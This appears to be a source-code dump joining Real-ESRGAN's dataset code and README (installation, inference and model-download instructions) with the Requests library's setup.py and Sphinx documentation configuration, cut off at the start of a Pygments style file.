circular_lowpass_kernel(omega_c, kernel_size, pad_to=21) sinc_kernel = torch.FloatTensor(sinc_kernel) else: sinc_kernel = self.pulse_tensor # BGR to RGB, HWC to CHW, numpy to tensor img_gt = img2tensor([img_gt], bgr2rgb=True, float32=True)[0] kernel = torch.FloatTensor(kernel) kernel2 = torch.FloatTensor(kernel2) return_d = {'gt': img_gt, 'kernel1': kernel, 'kernel2': kernel2, 'sinc_kernel': sinc_kernel, 'gt_path': gt_path} return return_d def __len__(self): return len(self.paths) File: realesrgan/data/realesrgan_paired_dataset.py import os from basicsr.data.data_util import paired_paths_from_folder, paired_paths_from_lmdb from basicsr.data.transforms import augment, paired_random_crop from basicsr.utils import FileClient, imfrombytes, img2tensor from basicsr.utils.registry import DATASET_REGISTRY from torch.utils import data as data from torchvision.transforms.functional import normalize @DATASET_REGISTRY.register() class RealESRGANPairedDataset(data.Dataset): """Paired image dataset for image restoration. Read LQ (Low Quality, e.g. LR (Low Resolution), blurry, noisy, etc) and GT image pairs. There are three modes: 1. 'lmdb': Use lmdb files. If opt['io_backend'] == lmdb. 2. 'meta_info': Use meta information file to generate paths. If opt['io_backend'] != lmdb and opt['meta_info'] is not None. 3. 'folder': Scan folders to generate paths. The rest. Args: opt (dict): Config for train datasets. It contains the following keys: dataroot_gt (str): Data root path for gt. dataroot_lq (str): Data root path for lq. meta_info (str): Path for meta information file. io_backend (dict): IO backend type and other kwarg. filename_tmpl (str): Template for each filename. Note that the template excludes the file extension. Default: '{}'. gt_size (int): Cropped patched size for gt patches. use_hflip (bool): Use horizontal flips. use_rot (bool): Use rotation (use vertical flip and transposing h and w for implementation). scale (bool): Scale, which will be added automatically. phase (str): 'train' or 'val'. """ def __init__(self, opt): super(RealESRGANPairedDataset, self).__init__() self.opt = opt self.file_client = None self.io_backend_opt = opt['io_backend'] # mean and std for normalizing the input images self.mean = opt['mean'] if 'mean' in opt else None self.std = opt['std'] if 'std' in opt else None self.gt_folder, self.lq_folder = opt['dataroot_gt'], opt['dataroot_lq'] self.filename_tmpl = opt['filename_tmpl'] if 'filename_tmpl' in opt else '{}' # file client (lmdb io backend) if self.io_backend_opt['type'] == 'lmdb': self.io_backend_opt['db_paths'] = [self.lq_folder, self.gt_folder] self.io_backend_opt['client_keys'] = ['lq', 'gt'] self.paths = paired_paths_from_lmdb([self.lq_folder, self.gt_folder], ['lq', 'gt']) elif 'meta_info' in self.opt and self.opt['meta_info'] is not None: # disk backend with meta_info # Each line in the meta_info describes the relative path to an image with open(self.opt['meta_info']) as fin: paths = [line.strip() for line in fin] self.paths = [] for path in paths: gt_path, lq_path = path.split(', ') gt_path = os.path.join(self.gt_folder, gt_path) lq_path = os.path.join(self.lq_folder, lq_path) self.paths.append(dict([('gt_path', gt_path), ('lq_path', lq_path)])) else: # disk backend # it will scan the whole folder to get meta info # it will be time-consuming for folders with too many files. It is recommended using an extra meta txt file self.paths = paired_paths_from_folder([self.lq_folder, self.gt_folder], ['lq', 'gt'], self.filename_tmpl) def __getitem__(self, index): if self.file_client is None: self.file_client = FileClient(self.io_backend_opt.pop('type'), **self.io_backend_opt) scale = self.opt['scale'] # Load gt and lq images. Dimension order: HWC; channel order: BGR; # image range: [0, 1], float32. gt_path = self.paths[index]['gt_path'] img_bytes = self.file_client.get(gt_path, 'gt') img_gt = imfrombytes(img_bytes, float32=True) lq_path = self.paths[index]['lq_path'] img_bytes = self.file_client.get(lq_path, 'lq') img_lq = imfrombytes(img_bytes, float32=True) # augmentation for training if self.opt['phase'] == 'train': gt_size = self.opt['gt_size'] # random crop img_gt, img_lq = paired_random_crop(img_gt, img_lq, gt_size, scale, gt_path) # flip, rotation img_gt, img_lq = augment([img_gt, img_lq], self.opt['use_hflip'], self.opt['use_rot']) # BGR to RGB, HWC to CHW, numpy to tensor img_gt, img_lq = img2tensor([img_gt, img_lq], bgr2rgb=True, float32=True) # normalize if self.mean is not None or self.std is not None: normalize(img_lq, self.mean, self.std, inplace=True) normalize(img_gt, self.mean, self.std, inplace=True) return {'lq': img_lq, 'gt': img_gt, 'lq_path': lq_path, 'gt_path': gt_path} def __len__(self): return len(self.paths)
<p align="center"> <img src="assets/realesrgan_logo.png" height=120> </p> ## <div align="center"><b><a href="README.md">English</a> | <a href="README_CN.md">简体中文</a></b></div> <div align="center"> 👀[**Demos**](#-demos-videos) **|** 🚩[**Updates**](#-updates) **|** ⚡[**Usage**](#-quick-inference) **|** 🏰[**Model Zoo**](docs/model_zoo.md) **|** 🔧[Install](#-dependencies-and-installation) **|** 💻[Train](docs/Training.md) **|** ❓[FAQ](docs/FAQ.md) **|** 🎨[Contribution](docs/CONTRIBUTING.md) [![download](https://img.shields.io/github/downloads/xinntao/Real-ESRGAN/total.svg)](https://github.com/xinntao/Real-ESRGAN/releases) [![PyPI](https://img.shields.io/pypi/v/realesrgan)](https://pypi.org/project/realesrgan/) [![Open issue](https://img.shields.io/github/issues/xinntao/Real-ESRGAN)](https://github.com/xinntao/Real-ESRGAN/issues) [![Closed issue](https://img.shields.io/github/issues-closed/xinntao/Real-ESRGAN)](https://github.com/xinntao/Real-ESRGAN/issues) [![LICENSE](https://img.shields.io/github/license/xinntao/Real-ESRGAN.svg)](https://github.com/xinntao/Real-ESRGAN/blob/master/LICENSE) [![python lint](https://github.com/xinntao/Real-ESRGAN/actions/workflows/pylint.yml/badge.svg)](https://github.com/xinntao/Real-ESRGAN/blob/master/.github/workflows/pylint.yml) [![Publish-pip](https://github.com/xinntao/Real-ESRGAN/actions/workflows/publish-pip.yml/badge.svg)](https://github.com/xinntao/Real-ESRGAN/blob/master/.github/workflows/publish-pip.yml) </div> 🔥 **AnimeVideo-v3 model (动漫视频小模型)**. Please see [[*anime video models*](docs/anime_video_model.md)] and [[*comparisons*](docs/anime_comparisons.md)]<br> 🔥 **RealESRGAN_x4plus_anime_6B** for anime images **(动漫插图模型)**. Please see [[*anime_model*](docs/anime_model.md)] <!-- 1. You can try in our website: [ARC Demo](https://arc.tencent.com/en/ai-demos/imgRestore) (now only support RealESRGAN_x4plus_anime_6B) --> 1. :boom: **Update** online Replicate demo: [![Replicate](https://img.shields.io/static/v1?label=Demo&message=Replicate&color=blue)](https://replicate.com/xinntao/realesrgan) 1. Online Colab demo for Real-ESRGAN: [![Colab](https://img.shields.io/static/v1?label=Demo&message=Colab&color=orange)](https://colab.research.google.com/drive/1k2Zod6kSHEvraybHl50Lys0LerhyTMCo?usp=sharing) **|** Online Colab demo for for Real-ESRGAN (**anime videos**): [![Colab](https://img.shields.io/static/v1?label=Demo&message=Colab&color=orange)](https://colab.research.google.com/drive/1yNl9ORUxxlL4N0keJa2SEPB61imPQd1B?usp=sharing) 1. Portable [Windows](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesrgan-ncnn-vulkan-20220424-windows.zip) / [Linux](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesrgan-ncnn-vulkan-20220424-ubuntu.zip) / [MacOS](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesrgan-ncnn-vulkan-20220424-macos.zip) **executable files for Intel/AMD/Nvidia GPU**. You can find more information [here](#portable-executable-files-ncnn). The ncnn implementation is in [Real-ESRGAN-ncnn-vulkan](https://github.com/xinntao/Real-ESRGAN-ncnn-vulkan) <!-- 1. You can watch enhanced animations in [Tencent Video](https://v.qq.com/s/topic/v_child/render/fC4iyCAM.html). 欢迎观看[腾讯视频动漫修复](https://v.qq.com/s/topic/v_child/render/fC4iyCAM.html) --> Real-ESRGAN aims at developing **Practical Algorithms for General Image/Video Restoration**.<br> We extend the powerful ESRGAN to a practical restoration application (namely, Real-ESRGAN), which is trained with pure synthetic data. 🌌 Thanks for your valuable feedbacks/suggestions. All the feedbacks are updated in [feedback.md](docs/feedback.md). --- If Real-ESRGAN is helpful, please help to ⭐ this repo or recommend it to your friends 😊 <br> Other recommended projects:<br> ▶️ [GFPGAN](https://github.com/TencentARC/GFPGAN): A practical algorithm for real-world face restoration <br> ▶️ [BasicSR](https://github.com/xinntao/BasicSR): An open-source image and video restoration toolbox<br> ▶️ [facexlib](https://github.com/xinntao/facexlib): A collection that provides useful face-relation functions.<br> ▶️ [HandyView](https://github.com/xinntao/HandyView): A PyQt5-based image viewer that is handy for view and comparison <br> ▶️ [HandyFigure](https://github.com/xinntao/HandyFigure): Open source of paper figures <br> --- ### 📖 Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data > [[Paper](https://arxiv.org/abs/2107.10833)] &emsp; [[YouTube Video](https://www.youtube.com/watch?v=fxHWoDSSvSc)] &emsp; [[B站讲解](https://www.bilibili.com/video/BV1H34y1m7sS/)] &emsp; [[Poster](https://xinntao.github.io/projects/RealESRGAN_src/RealESRGAN_poster.pdf)] &emsp; [[PPT slides](https://docs.google.com/presentation/d/1QtW6Iy8rm8rGLsJ0Ldti6kP-7Qyzy6XL/edit?usp=sharing&ouid=109799856763657548160&rtpof=true&sd=true)]<br> > [Xintao Wang](https://xinntao.github.io/), Liangbin Xie, [Chao Dong](https://scholar.google.com.hk/citations?user=OSDCB0UAAAAJ), [Ying Shan](https://scholar.google.com/citations?user=4oXBp9UAAAAJ&hl=en) <br> > [Tencent ARC Lab](https://arc.tencent.com/en/ai-demos/imgRestore); Shenzhen Institutes of Advanced Technology, Chinese Academy of Sciences <p align="center"> <img src="assets/teaser.jpg"> </p> --- <!---------------------------------- Updates ---------------------------> ## 🚩 Updates - ✅ Add the **realesr-general-x4v3** model - a tiny small model for general scenes. It also supports the **-dn** option to balance the noise (avoiding over-smooth results). **-dn** is short for denoising strength. - ✅ Update the **RealESRGAN AnimeVideo-v3** model. Please see [anime video models](docs/anime_video_model.md) and [comparisons](docs/anime_comparisons.md) for more details. - ✅ Add small models for anime videos. More details are in [anime video models](docs/anime_video_model.md). - ✅ Add the ncnn implementation [Real-ESRGAN-ncnn-vulkan](https://github.com/xinntao/Real-ESRGAN-ncnn-vulkan). - ✅ Add [*RealESRGAN_x4plus_anime_6B.pth*](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth), which is optimized for **anime** images with much smaller model size. More details and comparisons with [waifu2x](https://github.com/nihui/waifu2x-ncnn-vulkan) are in [**anime_model.md**](docs/anime_model.md) - ✅ Support finetuning on your own data or paired data (*i.e.*, finetuning ESRGAN). See [here](docs/Training.md#Finetune-Real-ESRGAN-on-your-own-dataset) - ✅ Integrate [GFPGAN](https://github.com/TencentARC/GFPGAN) to support **face enhancement**. - ✅ Integrated to [Huggingface Spaces](https://huggingface.co/spaces) with [Gradio](https://github.com/gradio-app/gradio). See [Gradio Web Demo](https://huggingface.co/spaces/akhaliq/Real-ESRGAN). Thanks [@AK391](https://github.com/AK391) - ✅ Support arbitrary scale with `--outscale` (It actually further resizes outputs with `LANCZOS4`). Add *RealESRGAN_x2plus.pth* model. - ✅ [The inference code](inference_realesrgan.py) supports: 1) **tile** options; 2) images with **alpha channel**; 3) **gray** images; 4) **16-bit** images. - ✅ The training codes have been released. A detailed guide can be found in [Training.md](docs/Training.md). --- <!---------------------------------- Demo videos ---------------------------> ## 👀 Demos Videos #### Bilibili - [大闹天宫片段](https://www.bilibili.com/video/BV1ja41117zb) - [Anime dance cut 动漫魔性舞蹈](https://www.bilibili.com/video/BV1wY4y1L7hT/) - [海贼王片段](https://www.bilibili.com/video/BV1i3411L7Gy/) #### YouTube ## 🔧 Dependencies and Installation - Python >= 3.7 (Recommend to use [Anaconda](https://www.anaconda.com/download/#linux) or [Miniconda](https://docs.conda.io/en/latest/miniconda.html)) - [PyTorch >= 1.7](https://pytorch.org/) ### Installation 1. Clone repo ```bash git clone https://github.com/xinntao/Real-ESRGAN.git cd Real-ESRGAN ``` 1. Install dependent packages ```bash # Install basicsr - https://github.com/xinntao/BasicSR # We use BasicSR for both training and inference pip install basicsr # facexlib and gfpgan are for face enhancement pip install facexlib pip install gfpgan pip install -r requirements.txt python setup.py develop ``` --- ## ⚡ Quick Inference There are usually three ways to inference Real-ESRGAN. 1. [Online inference](#online-inference) 1. [Portable executable files (NCNN)](#portable-executable-files-ncnn) 1. [Python script](#python-script) ### Online inference 1. You can try in our website: [ARC Demo](https://arc.tencent.com/en/ai-demos/imgRestore) (now only support RealESRGAN_x4plus_anime_6B) 1. [Colab Demo](https://colab.research.google.com/drive/1k2Zod6kSHEvraybHl50Lys0LerhyTMCo?usp=sharing) for Real-ESRGAN **|** [Colab Demo](https://colab.research.google.com/drive/1yNl9ORUxxlL4N0keJa2SEPB61imPQd1B?usp=sharing) for Real-ESRGAN (**anime videos**). ### Portable executable files (NCNN) You can download [Windows](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesrgan-ncnn-vulkan-20220424-windows.zip) / [Linux](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesrgan-ncnn-vulkan-20220424-ubuntu.zip) / [MacOS](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesrgan-ncnn-vulkan-20220424-macos.zip) **executable files for Intel/AMD/Nvidia GPU**. This executable file is **portable** and includes all the binaries and models required. No CUDA or PyTorch environment is needed.<br> You can simply run the following command (the Windows example, more information is in the README.md of each executable files): ```bash ./realesrgan-ncnn-vulkan.exe -i input.jpg -o output.png -n model_name ``` We have provided five models: 1. realesrgan-x4plus (default) 2. realesrnet-x4plus 3. realesrgan-x4plus-anime (optimized for anime images, small model size) 4. realesr-animevideov3 (animation video) You can use the `-n` argument for other models, for example, `./realesrgan-ncnn-vulkan.exe -i input.jpg -o output.png -n realesrnet-x4plus` #### Usage of portable executable files 1. Please refer to [Real-ESRGAN-ncnn-vulkan](https://github.com/xinntao/Real-ESRGAN-ncnn-vulkan#computer-usages) for more details. 1. Note that it does not support all the functions (such as `outscale`) as the python script `inference_realesrgan.py`. ```console Usage: realesrgan-ncnn-vulkan.exe -i infile -o outfile [options]... -h show this help -i input-path input image path (jpg/png/webp) or directory -o output-path output image path (jpg/png/webp) or directory -s scale upscale ratio (can be 2, 3, 4. default=4) -t tile-size tile size (>=32/0=auto, default=0) can be 0,0,0 for multi-gpu -m model-path folder path to the pre-trained models. default=models -n model-name model name (default=realesr-animevideov3, can be realesr-animevideov3 | realesrgan-x4plus | realesrgan-x4plus-anime | realesrnet-x4plus) -g gpu-id gpu device to use (default=auto) can be 0,1,2 for multi-gpu -j load:proc:save thread count for load/proc/save (default=1:2:2) can be 1:2,2,2:2 for multi-gpu -x enable tta mode" -f format output image format (jpg/png/webp, default=ext/png) -v verbose output ``` Note that it may introduce block inconsistency (and also generate slightly different results from the PyTorch implementation), because this executable file first crops the input image into several tiles, and then processes them separately, finally stitches together. ### Python script #### Usage of python script 1. You can use X4 model for **arbitrary output size** with the argument `outscale`. The program will further perform cheap resize operation after the Real-ESRGAN output. ```console Usage: python inference_realesrgan.py -n RealESRGAN_x4plus -i infile -o outfile [options]... A common command: python inference_realesrgan.py -n RealESRGAN_x4plus -i infile --outscale 3.5 --face_enhance -h show this help -i --input Input image or folder. Default: inputs -o --output Output folder. Default: results -n --model_name Model name. Default: RealESRGAN_x4plus -s, --outscale The final upsampling scale of the image. Default: 4 --suffix Suffix of the restored image. Default: out -t, --tile Tile size, 0 for no tile during testing. Default: 0 --face_enhance Whether to use GFPGAN to enhance face. Default: False --fp32 Use fp32 precision during inference. Default: fp16 (half precision). --ext Image extension. Options: auto | jpg | png, auto means using the same extension as inputs. Default: auto ``` #### Inference general images Download pre-trained models: [RealESRGAN_x4plus.pth](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth) ```bash wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth -P weights ``` Inference! ```bash python inference_realesrgan.py -n RealESRGAN_x4plus -i inputs --face_enhance ``` Results are in the `results` folder #### Inference anime images <p align="center"> <img src="https://raw.githubusercontent.com/xinntao/public-figures/master/Real-ESRGAN/cmp_realesrgan_anime_1.png"> </p> Pre-trained models: [RealESRGAN_x4plus_anime_6B](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth)<br> More details and comparisons with [waifu2x](https://github.com/nihui/waifu2x-ncnn-vulkan) are in [**anime_model.md**](docs/anime_model.md) ```bash # download model wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth -P weights # inference python inference_realesrgan.py -n RealESRGAN_x4plus_anime_6B -i inputs ``` Results are in the `results` folder --- ## BibTeX @InProceedings{wang2021realesrgan, author = {Xintao Wang and Liangbin Xie and Chao Dong and Ying Shan}, title = {Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data}, booktitle = {International Conference on Computer Vision Workshops (ICCVW)}, date = {2021} } ## 📧 Contact If you have any question, please email `[email protected]` or `[email protected]`. <!---------------------------------- Projects that use Real-ESRGAN ---------------------------> ## 🧩 Projects that use Real-ESRGAN If you develop/use Real-ESRGAN in your projects, welcome to let me know. - NCNN-Android: [RealSR-NCNN-Android](https://github.com/tumuyan/RealSR-NCNN-Android) by [tumuyan](https://github.com/tumuyan) - VapourSynth: [vs-realesrgan](https://github.com/HolyWu/vs-realesrgan) by [HolyWu](https://github.com/HolyWu) - NCNN: [Real-ESRGAN-ncnn-vulkan](https://github.com/xinntao/Real-ESRGAN-ncnn-vulkan) &nbsp;&nbsp;&nbsp;&nbsp;**GUI** - [Waifu2x-Extension-GUI](https://github.com/AaronFeng753/Waifu2x-Extension-GUI) by [AaronFeng753](https://github.com/AaronFeng753) - [Squirrel-RIFE](https://github.com/Justin62628/Squirrel-RIFE) by [Justin62628](https://github.com/Justin62628) - [Real-GUI](https://github.com/scifx/Real-GUI) by [scifx](https://github.com/scifx) - [Real-ESRGAN_GUI](https://github.com/net2cn/Real-ESRGAN_GUI) by [net2cn](https://github.com/net2cn) - [Real-ESRGAN-EGUI](https://github.com/WGzeyu/Real-ESRGAN-EGUI) by [WGzeyu](https://github.com/WGzeyu) - [anime_upscaler](https://github.com/shangar21/anime_upscaler) by [shangar21](https://github.com/shangar21) - [Upscayl](https://github.com/upscayl/upscayl) by [Nayam Amarshe](https://github.com/NayamAmarshe) and [TGS963](https://github.com/TGS963) ## 🤗 Acknowledgement Thanks for all the contributors. - [AK391](https://github.com/AK391): Integrate RealESRGAN to [Huggingface Spaces](https://huggingface.co/spaces) with [Gradio](https://github.com/gradio-app/gradio). See [Gradio Web Demo](https://huggingface.co/spaces/akhaliq/Real-ESRGAN). - [Asiimoviet](https://github.com/Asiimoviet): Translate the README.md to Chinese (中文). - [2ji3150](https://github.com/2ji3150): Thanks for the [detailed and valuable feedbacks/suggestions](https://github.com/xinntao/Real-ESRGAN/issues/131). - [Jared-02](https://github.com/Jared-02): Translate the Training.md to Chinese (中文).
requests
f12ccbef6d6b95564da8d22e280d28c39d53f0e9
File: setup.py #!/usr/bin/env python import os import sys from codecs import open from setuptools import setup CURRENT_PYTHON = sys.version_info[:2] REQUIRED_PYTHON = (3, 8) if CURRENT_PYTHON < REQUIRED_PYTHON: sys.stderr.write( """ ========================== Unsupported Python version ========================== This version of Requests requires at least Python {}.{}, but you're trying to install it on Python {}.{}. To resolve this, consider upgrading to a supported Python version. If you can't upgrade your Python version, you'll need to pin to an older version of Requests (<2.32.0). """.format( *(REQUIRED_PYTHON + CURRENT_PYTHON) ) ) sys.exit(1) # 'setup.py publish' shortcut. if sys.argv[-1] == "publish": os.system("python setup.py sdist bdist_wheel") os.system("twine upload dist/*") sys.exit() requires = [ "charset_normalizer>=2,<4", "idna>=2.5,<4", "urllib3>=1.21.1,<3", "certifi>=2017.4.17", ] test_requirements = [ "pytest-httpbin==2.0.0", "pytest-cov", "pytest-mock", "pytest-xdist", "PySocks>=1.5.6, !=1.5.7", "pytest>=3", ] about = {} here = os.path.abspath(os.path.dirname(__file__)) with open(os.path.join(here, "src", "requests", "__version__.py"), "r", "utf-8") as f: exec(f.read(), about) with open("README.md", "r", "utf-8") as f: readme = f.read() setup( name=about["__title__"], version=about["__version__"], description=about["__description__"], long_description=readme, long_description_content_type="text/markdown", author=about["__author__"], author_email=about["__author_email__"], url=about["__url__"], packages=["requests"], package_data={"": ["LICENSE", "NOTICE"]}, package_dir={"": "src"}, include_package_data=True, python_requires=">=3.8", install_requires=requires, license=about["__license__"], zip_safe=False, classifiers=[ "Development Status :: 5 - Production/Stable", "Environment :: Web Environment", "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Natural Language :: English", "Operating System :: OS Independent", "Programming Language :: Python", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: Implementation :: CPython", "Programming Language :: Python :: Implementation :: PyPy", "Topic :: Internet :: WWW/HTTP", "Topic :: Software Development :: Libraries", ], tests_require=test_requirements, extras_require={ "security": [], "socks": ["PySocks>=1.5.6, !=1.5.7"], "use_chardet_on_py3": ["chardet>=3.0.2,<6"], }, project_urls={ "Documentation": "https://requests.readthedocs.io", "Source": "https://github.com/psf/requests", }, ) File: docs/conf.py # -*- coding: utf-8 -*- # # Requests documentation build configuration file, created by # sphinx-quickstart on Fri Feb 19 00:05:47 2016. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys import os # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # sys.path.insert(0, os.path.abspath('.')) # Insert Requests' path into the system. sys.path.insert(0, os.path.abspath("..")) sys.path.insert(0, os.path.abspath("_themes")) import requests # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ "sphinx.ext.autodoc", "sphinx.ext.intersphinx", "sphinx.ext.todo", "sphinx.ext.viewcode", ] # Add any paths that contain templates here, relative to this directory. templates_path = ["_templates"] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # source_suffix = ['.rst', '.md'] source_suffix = ".rst" # The encoding of source files. # source_encoding = 'utf-8-sig' # The master toctree document. master_doc = "index" # General information about the project. project = u"Requests" copyright = u'MMXVIX. A <a href="https://kenreitz.org/projects">Kenneth Reitz</a> Project' author = u"Kenneth Reitz" # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = requests.__version__ # The full version, including alpha/beta/rc tags. release = requests.__version__ # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: # today = '' # Else, today_fmt is used as the format for a strftime call. # today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ["_build"] # The reST default role (used for this markup: `text`) to use for all # documents. # default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. add_function_parentheses = False # If true, the current module name will be prepended to all description # unit titles (such as .. function::). add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. # show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = "flask_theme_support.FlaskyStyle" # A list of ignored prefixes for module index sorting. # modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. # keep_warnings = False # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = True # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = "alabaster" # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. html_theme_options = { "show_powered_by": False, "github_user": "requests", "github_repo": "requests", "github_banner": True, "show_related": False, "note_bg": "#FFF59C", } # Add any paths that contain custom themes here, relative to this directory. # html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". # html_title = None # A shorter title for the navigation bar. Default is the same as html_title. # html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. # html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. # html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ["_static"] # Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. # html_extra_path = [] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. # html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. html_use_smartypants = False # Custom sidebar templates, maps document names to template names. html_sidebars = { "index": ["sidebarintro.html", "sourcelink.html", "searchbox.html", "hacks.html"], "**": [ "sidebarlogo.html", "localtoc.html", "relations.html", "sourcelink.html", "searchbox.html", "hacks.html", ], } # Additional templates that should be rendered to pages, maps page names to # template names. # html_additional_pages = {} # If false, no module index is generated. # html_domain_indices = True # If false, no index is generated. # html_use_index = True # If true, the index is split into individual pages for each letter. # html_split_index = False # If true, links to the reST sources are added to the pages. html_show_sourcelink = False # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. html_show_sphinx = False # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. # html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). # html_file_suffix = None # Language to be used for generating the HTML full-text search index. # Sphinx supports the following languages: # 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja' # 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr' # html_search_language = 'en' # A dictionary with options for the search language support, empty by default. # Now only 'ja' uses this config value # html_search_options = {'type': 'default'} # The name of a javascript file (relative to the configuration directory) that # implements a search results scorer. If empty, the default will be used. # html_search_scorer = 'scorer.js' # Output file base name for HTML help builder. htmlhelp_basename = "Requestsdoc" # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', # Latex figure (float) alignment #'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, "Requests.tex", u"Requests Documentation", u"Kenneth Reitz", "manual") ] # The name of an image file (relative to this directory) to place at the top of # the title page. # latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. # latex_use_parts = False # If true, show page references after internal links. # latex_show_pagerefs = False # If true, show URL addresses after external links. # latex_show_urls = False # Documents to append as an appendix to all manuals. # latex_appendices = [] # If false, no module index is generated. # latex_domain_indices = True # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [(master_doc, "requests", u"Requests Documentation", [author], 1)] # If true, show URL addresses after external links. # man_show_urls = False # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ ( master_doc, "Requests", u"Requests Documentation", author, "Requests", "One line description of project.", "Miscellaneous", ) ] # Documents to append as an appendix to all manuals. # texinfo_appendices = [] # If false, no module index is generated. # texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. # texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. # texinfo_no_detailmenu = False # -- Options for Epub output ---------------------------------------------- # Bibliographic Dublin Core info. epub_title = project epub_author = author epub_publisher = author epub_copyright = copyright # The basename for the epub file. It defaults to the project name. # epub_basename = project # The HTML theme for the epub output. Since the default themes are not # optimized for small screen space, using the same theme for HTML and epub # output is usually not wise. This defaults to 'epub', a theme designed to save # visual space. # epub_theme = 'epub' # The language of the text. It defaults to the language option # or 'en' if the language is not set. # epub_language = '' # The scheme of the identifier. Typical schemes are ISBN or URL. # epub_scheme = '' # The unique identifier of the text. This can be a ISBN number # or the project homepage. # epub_identifier = '' # A unique identification for the text. # epub_uid = '' # A tuple containing the cover image and cover page html template filenames. # epub_cover = () # A sequence of (type, uri, title) tuples for the guide element of content.opf. # epub_guide = () # HTML files that should be inserted before the pages created by sphinx. # The format is a list of tuples containing the path and title. # epub_pre_files = [] # HTML files that should be inserted after the pages created by sphinx. # The format is a list of tuples containing the path and title. # epub_post_files = [] # A list of files that should not be packed into the epub file. epub_exclude_files = ["search.html"] # The depth of the table of contents in toc.ncx. # epub_tocdepth = 3 # Allow duplicate toc entries. # epub_tocdup = True # Choose between 'default' and 'includehidden'. # epub_tocscope = 'default' # Fix unsupported image types using the Pillow. # epub_fix_images = False # Scale large images. # epub_max_image_width = 0 # How to display URL addresses: 'footnote', 'no', or 'inline'. # epub_show_urls = 'inline' # If false, no index is generated. # epub_use_index = True intersphinx_mapping = { "python": ("https://docs.python.org/3/", None), "urllib3": ("https://urllib3.readthedocs.io/en/latest", None), } File: docs/_themes/flask_theme_support.py # flasky extensions. flasky pygments style based on tango style from pygments.style import Style from pygments.token import Keyword, Name, Comment, String, Error, \ Number, Operator, Generic, Whitespace, Punctuation, Other, Literal class 